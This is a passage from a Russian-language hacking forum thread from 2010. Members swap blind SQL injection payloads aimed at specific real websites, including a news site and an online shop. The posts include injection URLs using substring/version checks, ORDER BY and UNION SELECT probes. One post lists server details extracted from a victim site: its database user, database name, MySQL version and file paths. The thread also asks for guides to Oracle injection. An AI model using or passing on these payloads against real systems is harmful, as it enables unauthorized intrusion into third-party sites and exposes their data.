ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12311  
Старый 02.04.2010, 16:27
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
Сообщение от G1G  
Парни , кто часто с blind Работает помогите раскурить , сам пока мало что понимаю:

http://www.lavozindependiente.com/news.php?nid=517'

Что то сам пытался..

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4=fa lse

http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5=tr ue

вот статья одного парня, желательно прочесть:
Цитата:
https://forum.antichat.ru/thread104591.html
 
Ответить с цитированием

  #12312  
Старый 02.04.2010, 16:58
Аватар для G1G
G1G
Banned
Регистрация: 04.06.2009
Сообщений: 58
Провел на форуме:
327313

Репутация: 23
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)=5

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
дальше сложнее, т.к. и union и select фильтруются неподецки
От души бро !
 
Ответить с цитированием

  #12313  
Старый 02.04.2010, 18:16
Аватар для [Feldmarschall]
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

_http://shop.rappers.in/alph_search_result.php?page=-2 тут вообще чтото можно сделать? с этой ecommerce... =(
 
Ответить с цитированием

  #12314  
Старый 02.04.2010, 18:41
Аватар для SnooPy
SnooPy
Новичок
Регистрация: 16.12.2009
Сообщений: 18
Провел на форуме:
92411

Репутация: 3
По умолчанию

Цитата:
Сообщение от [Feldmarschall]  
_http://shop.rappers.in/alph_search_result.php?page=-2 тут вообще чтото можно сделать? с этой ecommerce... =(
так вроде нет sql инъекции просто ошибка
 
Ответить с цитированием

  #12315  
Старый 03.04.2010, 00:17
Аватар для Jerri
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
Провел на форуме:
2510517

Репутация: 334
Отправить сообщение для Jerri с помощью ICQ
По умолчанию

Цитата:
Сообщение от [Feldmarschall]  
_http://shop.rappers.in/alph_search_result.php?page=-2 тут вообще чтото можно сделать? с этой ecommerce... =(
Переменная в число кажется преобразовывается, ничего сделать нельзя.
 
Ответить с цитированием

  #12316  
Старый 03.04.2010, 15:00
Аватар для G1G
G1G
Banned
Регистрация: 04.06.2009
Сообщений: 58
Провел на форуме:
327313

Репутация: 23
По умолчанию

Парни подскажите хорошую статью о проведении sqli в Oracle .
 
Ответить с цитированием

  #12317  
Старый 03.04.2010, 16:21
Аватар для FlaktW
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от Pashkela  
Код:
http://www.lavozindependiente.com/microsite.php?cha=66+and+substring(version(),1,1)=5

@@tmpdir: /tmp
@@basedir: /usr/
version(): 5.1.44
@@datadir: /var/lib/mysql/
@@version_compile_os: redhat-linux-gnu
user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
дальше сложнее, т.к. и union и select фильтруются неподецки
Pashkela как ты обошел фильтрацию, чтобы вытянуть это:

user(): hdn_bo_user@orinoco.venred.com
database(): lavozi_lavozindependiente_com_-_db
version(): 5.1.44


http://www.lavozindependiente.com/microsite.php?cha=66+order+by+3+--+

http://www.lavozindependiente.com/microsite.php?cha=-66+union+select+1,2,3+--+

Я пробовал, у меня не получается.
 
Ответить с цитированием

  #12318  
Старый 03.04.2010, 16:30
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Ну там же явно написано, крутил как слепую, по правилам (классическим) blind sql injection, для получения системной информации не требуется ни union, ни select
 
Ответить с цитированием

  #12319  
Старый 03.04.2010, 16:52
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
Сообщение от G1G  
Парни подскажите хорошую статью о проведении sqli в Oracle .
https://forum.antichat.ru/thread40576.html
https://forum.antichat.ru/thread162060.html
https://forum.antichat.ru/thread161670.html
 
Ответить с цитированием

  #12320  
Старый 03.04.2010, 17:04
Аватар для G1G
G1G
Banned
Регистрация: 04.06.2009
Сообщений: 58
Провел на форуме:
327313

Репутация: 23
По умолчанию

deleted

Последний раз редактировалось G1G; 03.04.2010 в 21:30..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ